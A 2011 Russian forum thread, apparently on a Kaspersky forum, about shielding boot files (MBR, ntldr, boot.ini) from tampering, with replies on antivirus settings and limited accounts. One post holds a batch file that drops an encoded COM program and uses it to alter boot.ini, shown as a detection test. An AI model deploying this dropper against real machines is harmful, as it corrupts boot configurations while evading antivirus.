sandkey Опубликовано 5 апреля, 2011 Поделиться Опубликовано 5 апреля, 2011 Собственно как защитить?. Интересует MBR, ntldr(bootmgr), boot.ini Ссылка на комментарий Поделиться на другие сайты Поделиться
Paddington Опубликовано 5 апреля, 2011 Поделиться Опубликовано 5 апреля, 2011 Уникальные технологии и разработки «Лаборатории Касперского» защищают вас от современных интернет-угроз: Вирусов, троянских программ, червей и других вредоносных, шпионских и рекламных программ Руткитов, буткитов и других сложных угроз Кражи личных данных с применением клавиатурных шпионов, программ, делающих снимки экрана, и фишинговых схем Ботнетов и других незаконных способов перехвата управления вашим компьютером Новейших видов атак, а также вновь возникающих и неизвестных угроз Заражений методом drive-by загрузки, сетевых атак и вторжений Нежелательного веб-контента и спама Думаю, дополнительно ничего делать не нужно. Ссылка на комментарий Поделиться на другие сайты Поделиться
apq Опубликовано 5 апреля, 2011 Поделиться Опубликовано 5 апреля, 2011 Собственно как защитить?. Интересует MBR, ntldr(bootmgr), boot.ini содержать в актуальном состоянии базы и модули продукта Ссылка на комментарий Поделиться на другие сайты Поделиться
Skarbovoy Опубликовано 5 апреля, 2011 Поделиться Опубликовано 5 апреля, 2011 содержать в актуальном состоянии базы и модули продукта Согласен. В новом SW, который приходит с базами есть обновляемая "защита" от буткитов. Ссылка на комментарий Поделиться на другие сайты Поделиться
sandkey Опубликовано 6 апреля, 2011 Автор Поделиться Опубликовано 6 апреля, 2011 (изменено) Думаю, дополнительно ничего делать не нужно. содержать в актуальном состоянии базы и модули продукта Наверное я не так выразился. Все таки запретить изменения пользователем загрузчиков. GRUB я не стал запускать, Но думаю КИС на него не сработает. Спокойно переместил(стер) ntldr. А вот с boot.ini немного усложнил задачу. Воспользовался довольно известным кодом замены строк(в данном примере код изменен): @echo off :: Create the assembler program, by Herbert Kleebauer echo hfjkdspj@jzh`0X-`/PPPPPPa(DE(DM(DO(Dh(Ls(Lu(LX(LeZRR]EEEUYRX2Dx=> %temp%.\sbs2.com echo 0DxFP,0Xx.t0P,=XtGsB4o@$?PIyU!WvX0GwUY Wv;ovBX2Gv0ExGIuht6>> %temp%.\sbs2.com echo ?@}IKuNWpe~Fpe?FNHlF?wGMECIQqo{Ox{T?kPv@jeoSeIlRFD@{AyEKj@>> %temp%.\sbs2.com echo iqe~1NeAyR?mHAG~BGRgB{~H?o~TsdgCYqe?HR~upkpBG?~slJBCyA?@xA>> %temp%.\sbs2.com echo LZp{xq`Cs?H[C_vHDyB?Hos@QslFA@wQ~~x}viH}`LYNBGyA?@xAB?sUq`>> %temp%.\sbs2.com echo LRy@PwtCYQEuFK@A~BxPtDss@fFqjVmzD@qBEOEenU?`eHHeBCMs?FExep>> %temp%.\sbs2.com echo LHsPBGyA?@xAunjzA}EKNs@CA?wQpQpKLBHv?s`WJ`LRCYyIWMJaejCksl>> %temp%.\sbs2.com echo H[GyFGhHBwHZjjHeoFasuFUJeHeB?OsQH[xeHCPvqFj@oq@eNc?~}Nu?O>> %temp%.\sbs2.com echo ~oEwoAjBKs?Zp`LBzHQzyEFrAWAG{EFrAqAGYwHTECIQ{coKIsaCsf{Oe~>> %temp%.\sbs2.com echo CK}Ayre~CNFA{rAyEKFACrA{EKGAjbA}eKGSjNMtQFtc{OAyDGFj?{FDGQ>> %temp%.\sbs2.com echo KAjNVk_OCAx@e?f{o?CosI}1EGizhljJ~H1ZeG}JBA~rACBMDGjjDG@g0>> %temp%.\sbs2.com :: Use the program %temp%.\sbs2.com 0 "[boot loader]" "format c" < с:\boot.ini > с:\boot.in :: Delete the program del %temp%.\sbs2.com boot.ini соответственно изменен и КИС молчит. Почему и спрашиваю о возможности защиты. PS кто мешает злоумышленнику прислать этот батник пользователю((( Изменено 6 апреля, 2011 пользователем sandkey Ссылка на комментарий Поделиться на другие сайты Поделиться
Skarbovoy Опубликовано 6 апреля, 2011 Поделиться Опубликовано 6 апреля, 2011 sandkey Можно оригинал в ЛС? Посмотрю на виртуалке. Ссылка на комментарий Поделиться на другие сайты Поделиться
sandkey Опубликовано 6 апреля, 2011 Автор Поделиться Опубликовано 6 апреля, 2011 Можно оригинал в ЛС? отправил Ссылка на комментарий Поделиться на другие сайты Поделиться
Drru Опубликовано 6 апреля, 2011 Поделиться Опубликовано 6 апреля, 2011 Наверное я не так выразился. Все таки запретить изменения пользователем загрузчиков.GRUB я не стал запускать, Но думаю КИС на него не сработает. Спокойно переместил(стер) ntldr. А вот с boot.ini немного усложнил задачу. Воспользовался довольно известным кодом замены строк(в данном примере код изменен): ................................................................................ .................. boot.ini соответственно изменен и КИС молчит. Почему и спрашиваю о возможности защиты. PS кто мешает злоумышленнику прислать этот батник пользователю((( 1. Включен автоматический режим или интерактивный? 2. Если включить интерактивный и руками перенести этот батник в слабые ограничения, KIS промолчит? Ссылка на комментарий Поделиться на другие сайты Поделиться
apq Опубликовано 6 апреля, 2011 Поделиться Опубликовано 6 апреля, 2011 Наверное я не так выразился. Все таки запретить изменения пользователем загрузчиков. думаю, что это решается на уровне пользовательских учетных записей. GRUB я не стал запускать, Но думаю КИС на него не сработает. груб работает до загрузки ОС, так что никакой антивирус, не может на него сработать по умолчанию. кто мешает злоумышленнику прислать этот батник пользователю а зачем запускать все подряд батники? вообще обычный юзер нынче пользуется батниками? сомнительно Ссылка на комментарий Поделиться на другие сайты Поделиться
Drru Опубликовано 6 апреля, 2011 Поделиться Опубликовано 6 апреля, 2011 Нашёл, помню, была тема. Спорили много, до хрипоты. :blink: Посмотрите этот пост: http://forum.kaspersky.com/index.php?showt...st&p=652301 Ну и, если будет интересно, всю тему. Ссылка на комментарий Поделиться на другие сайты Поделиться
sandkey Опубликовано 6 апреля, 2011 Автор Поделиться Опубликовано 6 апреля, 2011 (изменено) 1. Включен автоматический режим или интерактивный?2. Если включить интерактивный и руками перенести этот батник в слабые ограничения, KIS промолчит? Был включен автомат. Переключил в интерактив, батник в слабые ограничения сам встал, хм, а вот создаваемого батником ком-файла ни в контроле программ ни в отчете нигде нет. КИС молчит. груб работает до загрузки ОС Я имел ввиду запуск инсталятора груба для его установки при запущенном каспере. вообще обычный юзер нынче пользуется батниками?оНу в данном случае батник создает ком файл на ассемблере(есно без цифровой подписи) и он спокойно запускается Изменено 6 апреля, 2011 пользователем sandkey Ссылка на комментарий Поделиться на другие сайты Поделиться
Drru Опубликовано 6 апреля, 2011 Поделиться Опубликовано 6 апреля, 2011 (изменено) Ну в данном случае батник создает ком файл на ассемблере(есно без цифровой подписи) и он спокойно запускается Я у себя обычно (не сейчас) ставлю запрос на запуск всех программ не попавших в доверенные. Для меня этого достаточно. А если прикрутить "костыль", как написано в сообщении №10? Хотя, гораздо проще сидеть с ограниченными правами, впрочем - это на любителя. Изменено 6 апреля, 2011 пользователем Drru Ссылка на комментарий Поделиться на другие сайты Поделиться
sandkey Опубликовано 6 апреля, 2011 Автор Поделиться Опубликовано 6 апреля, 2011 А если прикрутить "костыль", как написано в сообщении №10? Ага, спасибо читаю как раз эту ветку. Ссылка на комментарий Поделиться на другие сайты Поделиться
Рекомендуемые сообщения
Пожалуйста, войдите, чтобы комментировать
Вы сможете оставить комментарий после входа в
Войти